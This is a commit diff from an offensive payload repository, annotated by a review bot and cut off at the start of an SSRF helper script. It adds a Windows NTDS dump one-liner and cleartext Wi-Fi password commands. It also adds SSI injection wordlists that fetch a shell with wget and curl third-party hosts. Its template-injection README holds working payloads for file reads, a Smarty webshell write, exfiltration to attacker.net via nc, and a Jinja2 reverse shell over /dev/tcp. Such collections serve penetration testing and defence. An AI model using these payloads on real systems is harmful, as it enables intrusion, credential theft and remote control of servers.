mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-21 18:58:50 +00:00
Bugfix - Errors in stashed changes
parent
cd2d76d538
commit
b9f2fe367c
@ -1,6 +1,6 @@
|
|||||||
# Cross-Site Request Forgery
|
# Cross-Site Request Forgery
|
||||||
|
|
||||||
> Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
|
> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
|
||||||
|
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
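Review bot: The `/XSRF` alias is inserted inside the blockquote that ends with "- OWASP", so the line no longer matches the wording it attributes to OWASP. Keep the quotation as it was and introduce the alias outside it, for example in a short sentence under the heading ("also written XSRF").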
@ -14,6 +14,8 @@
|
|||||||
|
|
||||||
## Payloads
|
## Payloads
|
||||||
|
|
||||||
|
When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
|
||||||
|
|
||||||
### HTML GET – Requiring User Interaction for Proof-of-Concept
|
### HTML GET – Requiring User Interaction for Proof-of-Concept
|
||||||
|
|
||||||
```html
|
```html
|
||||||
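Review bot: The paragraph added under `## Payloads` is background on why the attack works, not a payload, and it sits between the section heading and the first payload subsection; it would read better directly after the introductory quote. Its wording "is sent with every request to that site" is also stated without qualification: cookies set with the `SameSite` attribute are not attached to every cross-site request, so say "typically" or name that exception.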
@ -98,4 +100,5 @@ xhr.send('{"role":admin}');
|
|||||||
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd
|
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd
|
||||||
- [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani
|
- [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani
|
||||||
- [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones
|
- [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones
|
||||||
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
|
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
|
||||||
|
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
|
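Review bot: The reference added at the end of the list is formatted "Title - Author - Date", while the entries above it use "Title by author" (for example "by phwd", "by Dr.Jones"). Pick one style for the whole list so the new entry does not stand out.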
@ -185,6 +185,12 @@ ifm: quit
|
|||||||
ntdsutil: quit
|
ntdsutil: quit
|
||||||
```
|
```
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
||||||
|
```
|
||||||
|
|
||||||
#### Using Vshadow
|
#### Using Vshadow
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
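Review bot: The added block is introduced only by a bare "or", which does not say what it is an alternative to or how it differs from the interactive session that ends with `ifm: quit` / `ntdsutil: quit` just above. Replace it with one sentence stating that this is the single-command, non-interactive form, spell out the abbreviation `ac i ntds` (activate instance ntds), and note that the output is written to `c:\temp`.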
@ -225,6 +225,39 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
|||||||
C:\inetpub\wwwroot\web.config
|
C:\inetpub\wwwroot\web.config
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Other files
|
||||||
|
|
||||||
|
```bat
|
||||||
|
%SYSTEMDRIVE%\pagefile.sys
|
||||||
|
%WINDIR%\debug\NetSetup.log
|
||||||
|
%WINDIR%\repair\sam
|
||||||
|
%WINDIR%\repair\system
|
||||||
|
%WINDIR%\repair\software, %WINDIR%\repair\security
|
||||||
|
%WINDIR%\iis6.log
|
||||||
|
%WINDIR%\system32\config\AppEvent.Evt
|
||||||
|
%WINDIR%\system32\config\SecEvent.Evt
|
||||||
|
%WINDIR%\system32\config\default.sav
|
||||||
|
%WINDIR%\system32\config\security.sav
|
||||||
|
%WINDIR%\system32\config\software.sav
|
||||||
|
%WINDIR%\system32\config\system.sav
|
||||||
|
%WINDIR%\system32\CCM\logs\*.log
|
||||||
|
%USERPROFILE%\ntuser.dat
|
||||||
|
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
|
||||||
|
%WINDIR%\System32\drivers\etc\hosts
|
||||||
|
```
|
||||||
|
|
||||||
|
### Wifi passwords
|
||||||
|
|
||||||
|
Find AP SSID
|
||||||
|
```bat
|
||||||
|
netsh wlan show profile
|
||||||
|
```
|
||||||
|
|
||||||
|
Get Cleartext Pass
|
||||||
|
```bat
|
||||||
|
netsh wlan show profile <SSID> key=clear
|
||||||
|
```
|
||||||
|
|
||||||
## Processes Enumeration and Tasks
|
## Processes Enumeration and Tasks
|
||||||
|
|
||||||
What processes are running?
|
What processes are running?
|
||||||
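Review bot: In the `### Other files` block, `%WINDIR%\repair\software, %WINDIR%\repair\security` puts two paths on one line separated by a comma, while every other entry is one path per line; split it so the list can be consumed line by line. The block is fenced as `bat` although it is a list of paths and not a script, and it mixes legacy locations (the `.Evt` logs, the 8.3 `LocalS~1\Tempor~1` path) with current ones without saying which Windows versions each applies to. Under `### Wifi passwords`, the labels "Find AP SSID" and "Get Cleartext Pass" would read better as full sentences.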
@ -372,4 +405,4 @@ runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
|||||||
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
|
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
|
||||||
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
|
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
|
||||||
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
|
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
|
||||||
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
|
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
|
BIN
Server Side Template Injection/Images/serverside.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 44 KiB |
@ -0,0 +1,75 @@
|
|||||||
|
<pre><!--#exec cmd="ls" --></pre>
|
||||||
|
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||||
|
<pre><!--#exec cmd="whoami"--></pre>
|
||||||
|
<pre><!--#exec cmd="dir" --></pre>
|
||||||
|
<!--#exec cmd="ls" -->
|
||||||
|
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||||
|
<!--#exec cmd="/bin/ls /" -->
|
||||||
|
<!--#exec cmd="dir" -->
|
||||||
|
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||||
|
<!--#config errmsg="File not found, informs users and password"-->
|
||||||
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
<!--#config timefmt="A %B %d %Y %r"-->
|
||||||
|
<!--#fsize file="ssi.shtml" -->
|
||||||
|
<!--#include file=?UUUUUUUU...UU?-->
|
||||||
|
<!--#echo var="DATE_LOCAL" -->
|
||||||
|
<!--#exec cmd="whoami"-->
|
||||||
|
<!--#printenv -->
|
||||||
|
<!--#flastmod virtual="echo.html" -->
|
||||||
|
<!--#echo var="auth_type" -->
|
||||||
|
<!--#echo var="http_referer" -->
|
||||||
|
<!--#echo var="content_length" -->
|
||||||
|
<!--#echo var="content_type" -->
|
||||||
|
<!--#echo var="http_accept_encoding" -->
|
||||||
|
<!--#echo var="forwarded" -->
|
||||||
|
<!--#echo var="document_uri" -->
|
||||||
|
<!--#echo var="date_gmt" -->
|
||||||
|
<!--#echo var="date_local" -->
|
||||||
|
<!--#echo var="document_name" -->
|
||||||
|
<!--#echo var="document_root" -->
|
||||||
|
<!--#echo var="from" -->
|
||||||
|
<!--#echo var="gateway_interface" -->
|
||||||
|
<!--#echo var="http_accept" -->
|
||||||
|
<!--#echo var="http_accept_charset" -->
|
||||||
|
<!--#echo var="http_accept_language" -->
|
||||||
|
<!--#echo var="http_connection" -->
|
||||||
|
<!--#echo var="http_cookie" -->
|
||||||
|
<!--#echo var="http_form" -->
|
||||||
|
<!--#echo var="http_host" -->
|
||||||
|
<!--#echo var="user_name" -->
|
||||||
|
<!--#echo var="unique_id" -->
|
||||||
|
<!--#echo var="tz" -->
|
||||||
|
<!--#echo var="total_hits" -->
|
||||||
|
<!--#echo var="server_software" -->
|
||||||
|
<!--#echo var="server_protocol" -->
|
||||||
|
<!--#echo var="server_port" -->
|
||||||
|
<!--#echo var="server_name -->
|
||||||
|
<!--#echo var="server_addr" -->
|
||||||
|
<!--#echo var="server_admin" -->
|
||||||
|
<!--#echo var="script_url" -->
|
||||||
|
<!--#echo var="script_uri" -->
|
||||||
|
<!--#echo var="script_name" -->
|
||||||
|
<!--#echo var="script_filename" -->
|
||||||
|
<!--#echo var="netsite_root" -->
|
||||||
|
<!--#echo var="site_htmlroot" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info_translated" -->
|
||||||
|
<!--#echo var="request_uri" -->
|
||||||
|
<!--#echo var="request_method" -->
|
||||||
|
<!--#echo var="remote_user" -->
|
||||||
|
<!--#echo var="remote_addr" -->
|
||||||
|
<!--#echo var="http_client_ip" -->
|
||||||
|
<!--#echo var="remote_port" -->
|
||||||
|
<!--#echo var="remote_ident" -->
|
||||||
|
<!--#echo var="remote_host" -->
|
||||||
|
<!--#echo var="query_string_unescaped" -->
|
||||||
|
<!--#echo var="query_string" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info" -->
|
||||||
|
<!--#echo var="path" -->
|
||||||
|
<!--#echo var="page_count" -->
|
||||||
|
<!--#echo var="last_modified" -->
|
||||||
|
<!--#echo var="http_user_agent" -->
|
||||||
|
<!--#echo var="http_ua_os" -->
|
||||||
|
<!--#echo var="http_ua_cpu" -->
|
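Review bot: Several entries in this 75-line list are not well-formed SSI directives: `<!--#exec cmd="cd C:\WINDOWS\System32">` closes with `>` instead of `-->`, `<!--#echo var="server_name -->` is missing the closing quote, and `<!--#include file=?UUUUUUUU...UU?-->` has `?` in place of quotes and an elided value. If these are deliberate malformed test cases, say so in the accompanying README; otherwise correct them. The list also repeats entries (`<!--#exec cmd="whoami"-->`, `<!--#echo var="DATE_LOCAL" -->`, `<!--#echo var="path_translated" -->`), which only produces duplicate requests when the file is used as a wordlist.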
18
Server Side Template Injection/Intruder/ssi_quick.txt
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
</nowiki>
|
||||||
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
<!--#config timefmt="A %B %d %Y %r"-->
|
||||||
|
<!--#echo var="DATE_LOCAL" -->
|
||||||
|
<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#include virtual="/" -->
|
||||||
|
<!--#exec cmd="ls" -->
|
||||||
|
<!--#exec cmd="whoami" -->
|
||||||
|
<!--#exec cmd="uname" -->
|
||||||
|
<!--#exec cmd="dir" -->
|
||||||
|
<!--#exec cmd="cat /etc/passwd" -->
|
||||||
|
<!--#exec cmd="ipconfig" -->
|
||||||
|
<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#exec cmd="perl -e 'print "X"*5000'" -->
|
||||||
|
<!--#exec cmd="sleep 5" -->
|
||||||
|
<!--#exec cmd="sleep 10" -->
|
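Review bot: Three entries hard-code third-party hosts (`<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->`, the `crowdshield.com` variant and the `curl` entry), so anyone running this list makes the system under test contact servers outside the tester's control and discloses the engagement to their operators. Replace them with a clearly marked placeholder host that the tester points at infrastructure they own. The first line, `</nowiki>`, is leftover wiki markup and should be removed, and `cmd="perl -e 'print "X"*5000'"` contains unescaped double quotes inside the `cmd` attribute value.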
327
Server Side Template Injection/README.md
Normal file
@ -0,0 +1,327 @@
|
|||||||
|
# Templates Injections
|
||||||
|
|
||||||
|
> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Methodology](#methodology)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [List files and directories](#list-files-and-directories)
|
||||||
|
* [Java](#java)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [Twig](#twig)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Code execution](#code-execution)
|
||||||
|
* [Smarty](#smarty)
|
||||||
|
* [Freemarker](#freemarker)
|
||||||
|
* [Jade / Codepen](#jade---codepen)
|
||||||
|
* [Velocity](#velocity)
|
||||||
|
* [Mako](#mako)
|
||||||
|
* [Jinja2](#jinja2)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Dump all used classes](#dump-all-used-classes)
|
||||||
|
* [Dump all config variables](#dump-all-config-variables)
|
||||||
|
* [Read remote file](#read-remote-file)
|
||||||
|
* [Write into remote file](#write-into-remote-file)
|
||||||
|
* [Remote Code Execution](#remote-code-execution)
|
||||||
|
* [Filter bypass](filter-bypass)
|
||||||
|
* [Jinjava](#jinjava)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Command execution](#command-execution)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||||
|
e.g:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
|
||||||
|
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
|
||||||
|
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||||
|
```
|
||||||
|
|
||||||
|
## Methodology
|
||||||
|
|
||||||
|
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20injections/Images/serverside.png?raw=true)
|
||||||
|
|
||||||
|
## Ruby
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= 7 * 7 %>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Retrieve /etc/passwd
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= File.open('/etc/passwd').read %>
|
||||||
|
```
|
||||||
|
|
||||||
|
### List files and directories
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= Dir.entries('/') %>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Java
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```java
|
||||||
|
${7*7}
|
||||||
|
${{7*7}}
|
||||||
|
${class.getClassLoader()}
|
||||||
|
${class.getResource("").getPath()}
|
||||||
|
${class.getResource("../../../../../index.htm").getContent()}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Retrieve the system’s environment variables
|
||||||
|
|
||||||
|
```java
|
||||||
|
${T(java.lang.System).getenv()}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Retrieve /etc/passwd
|
||||||
|
|
||||||
|
```java
|
||||||
|
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
|
|
||||||
|
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Twig
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{7*7}}
|
||||||
|
{{7*'7'}} would result in 49
|
||||||
|
```
|
||||||
|
|
||||||
|
### Template format
|
||||||
|
|
||||||
|
```python
|
||||||
|
$output = $twig > render (
|
||||||
|
'Dear' . $_GET['custom_greeting'],
|
||||||
|
array("first_name" => $user.first_name)
|
||||||
|
);
|
||||||
|
|
||||||
|
$output = $twig > render (
|
||||||
|
"Dear {first_name}",
|
||||||
|
array("first_name" => $user.first_name)
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Code execution
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{self}}
|
||||||
|
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||||
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Smarty
|
||||||
|
|
||||||
|
```python
|
||||||
|
{php}echo `id`;{/php}
|
||||||
|
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Freemarker
|
||||||
|
|
||||||
|
Default functionality.
|
||||||
|
|
||||||
|
```python
|
||||||
|
<#assign
|
||||||
|
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Jade / Codepen
|
||||||
|
|
||||||
|
```python
|
||||||
|
- var x = root.process
|
||||||
|
- x = x.mainModule.require
|
||||||
|
- x = x('child_process')
|
||||||
|
= x.exec('id | nc attacker.net 80')
|
||||||
|
```
|
||||||
|
|
||||||
|
## Velocity
|
||||||
|
|
||||||
|
```python
|
||||||
|
#set($str=$class.inspect("java.lang.String").type)
|
||||||
|
#set($chr=$class.inspect("java.lang.Character").type)
|
||||||
|
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
|
||||||
|
$ex.waitFor()
|
||||||
|
#set($out=$ex.getInputStream())
|
||||||
|
#foreach($i in [1..$out.available()])
|
||||||
|
$str.valueOf($chr.toChars($out.read()))
|
||||||
|
#end
|
||||||
|
```
|
||||||
|
|
||||||
|
## Mako
|
||||||
|
|
||||||
|
```python
|
||||||
|
<%
|
||||||
|
import os
|
||||||
|
x=os.popen('id').read()
|
||||||
|
%>
|
||||||
|
${x}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Jinja2
|
||||||
|
|
||||||
|
[Official website](http://jinja.pocoo.org/)
|
||||||
|
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{4*4}}[[5*5]]
|
||||||
|
{{7*'7'}} would result in 7777777
|
||||||
|
```
|
||||||
|
|
||||||
|
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||||
|
The above injections have been tested on Flask application.
|
||||||
|
|
||||||
|
### Template format
|
||||||
|
|
||||||
|
```python
|
||||||
|
{% extends "layout.html" %}
|
||||||
|
{% block body %}
|
||||||
|
<ul>
|
||||||
|
{% for user in users %}
|
||||||
|
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
|
||||||
|
{% endfor %}
|
||||||
|
</ul>
|
||||||
|
{% endblock %}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Dump all used classes
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ [].class.base.subclasses() }}
|
||||||
|
{{''.class.mro()[1].subclasses()}}
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Dump all config variables
|
||||||
|
|
||||||
|
```python
|
||||||
|
{% for key, value in config.iteritems() %}
|
||||||
|
<dt>{{ key|e }}</dt>
|
||||||
|
<dd>{{ value|e }}</dd>
|
||||||
|
{% endfor %}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Read remote file
|
||||||
|
|
||||||
|
```python
|
||||||
|
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Write into remote file
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Remote Code Execution
|
||||||
|
|
||||||
|
Listen for connexion
|
||||||
|
|
||||||
|
```bash
|
||||||
|
nv -lnvp 8000
|
||||||
|
```
|
||||||
|
|
||||||
|
Inject this template
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
|
||||||
|
{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
|
||||||
|
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||||
|
```
|
||||||
|
|
||||||
|
### Filter bypass
|
||||||
|
|
||||||
|
```python
|
||||||
|
request.__class__
|
||||||
|
request["__class__"]
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `_`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
|
||||||
|
|
||||||
|
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||||
|
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||||
|
{{request|attr(["__","class","__"]|join)}}
|
||||||
|
{{request|attr("__class__")}}
|
||||||
|
{{request.__class__}}
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `[` and `]`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
|
||||||
|
or
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `|join`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
||||||
|
```
|
||||||
|
|
||||||
|
## Jinjava
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{'a'.toUpperCase()}} would result in 'A'
|
||||||
|
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
|
||||||
|
```
|
||||||
|
|
||||||
|
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
|
||||||
|
|
||||||
|
### Command execution
|
||||||
|
|
||||||
|
Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||||
|
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||||
|
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||||
|
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||||
|
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||||
|
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
||||||
|
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
||||||
|
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
||||||
|
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
||||||
|
* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
||||||
|
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
|
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
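Review bot: The `## Methodology` image URL points at `Server%20Side%20Template%20injections/Images/serverside.png`, but this commit adds the image as `Server Side Template Injection/Images/serverside.png`, so the directory name does not match; use a relative path such as `Images/serverside.png` so the link follows the file. In `## Summary`, the entries `(retrieve-the-system-s-environment-variables)` and `(filter-bypass)` lack the leading `#`, and the repeated `#basic-injection`, `#template-format` and `#retrieve--etc-passwd` links point to the same anchor, so they all land on the first heading with that name. Most fences are tagged `python` although they hold Twig/PHP, Smarty, Freemarker, Jade and Velocity templates, the Tplmap commands are tagged `powershell`, and the Twig sample writes `$twig > render` where PHP method-call syntax is `->`. The `### Command execution` note under Jinjava names the fixing pull request but not the affected or fixed version, which readers need in order to judge their exposure.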
780
Server-Side Request Forgery/Files/ip.py
Normal file
@ -0,0 +1,780 @@
|
|||||||
|
#!/usr/bin/python
|
||||||
|
# coding=utf-8
|
||||||
|
# https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py
|
||||||
|
from __future__ import print_function
|
||||||
|
from random import *
|
||||||
|
from io import open
|
||||||
|
import datetime
|
||||||
|
import string
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import platform
|
||||||
|
import random
|
||||||
|
|
||||||
|
EnclosedAlphanumericsData = {
|
||||||
|
'0' : ['⓪'],
|
||||||
|
'1' : ['①'],
|
||||||
|
'2' : ['②'],
|
||||||
|
'3' : ['③'],
|
||||||
|
'4' : ['④'],
|
||||||
|
